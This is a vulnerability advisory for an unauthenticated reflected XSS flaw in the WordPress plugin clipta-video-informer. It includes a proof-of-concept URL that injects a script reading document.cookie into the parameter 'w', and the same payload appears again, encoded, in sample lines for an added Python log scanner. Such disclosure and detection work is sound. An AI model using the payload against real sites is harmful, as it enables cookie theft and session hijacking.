wp-plugin : clipta-video-informer – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : clipta-video-informer

 

Affected Version : 1.0 (and most probably lower versions, if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/clipta-video-informer/add-news.php?w=w"></script><script>alert(document.cookie)</script>

 

Vulnerable Parameter : w

 

Type of XSS : Reflected
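
A way to review web-server access logs for requests that match this issue, added here as an example (it is not part of the original advisory or the plugin's code). It assumes Apache/nginx "combined" format logs; the sample log lines, the IP addresses and the value `w=300` are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter are taken from the advisory; the combined log format is an assumption.
PLUGIN_PATH = "/wp-content/plugins/clipta-video-informer/add-news.php"
PARAM = "w"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out of an attribute or script block.
MARKUP_RE = re.compile(r"[<>\"']")

# Constructed sample lines (documentation IP range); line 2 carries the advisory's PoC.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jul/2014:10:00:00 +0000] "GET /wp-content/plugins/'
    'clipta-video-informer/add-news.php?w=300 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Jul/2014:10:00:05 +0000] "GET /wp-content/plugins/'
    'clipta-video-informer/add-news.php?w=w%22%3E%3C/script%3E%3Cscript%3E'
    'alert(document.cookie)%3C/script%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Jul/2014:10:00:09 +0000] "GET /blog/wp-content/plugins/'
    'clipta-video-informer/add-news.php?w=%253Cscript%253E HTTP/1.1" 200 640 "-" "-"',
    '203.0.113.7 - - [07/Jul/2014:10:01:00 +0000] "GET /index.php?w=%3Cb%3E '
    'HTTP/1.1" 200 100 "-" "-"',
]

def suspicious_w_values(line):
    """Return decoded `w` values containing markup, for requests to add-news.php."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    try:
        url = urlsplit(match.group(1))
    except ValueError:  # malformed request target
        return []
    # endswith() also covers WordPress installed in a subdirectory.
    if not unquote(url.path).lower().endswith(PLUGIN_PATH):
        return []
    hits = []
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        decoded = unquote(value)  # second pass catches double-encoded input
        if MARKUP_RE.search(decoded):
            hits.append(decoded)
    return hits

def scan(lines):
    """Return (line_number, values) for every log line that should be reviewed."""
    return [(n, v) for n, l in enumerate(lines, 1) if (v := suspicious_w_values(l))]

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(number, values)
```
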

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-04

 
Plugin Status : Closed
 
Public Disclosure : July 7, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Clipta Video Informer is a free service for Web publishers that offers access to the Clipta Partner Network to promote their video content and drive more traffic to their site.
Publishers can now easily add news to [Info.Clipta.com](http://info.clipta.com) which will also appear on other topically relevant sites in the Clipta Informer Network.
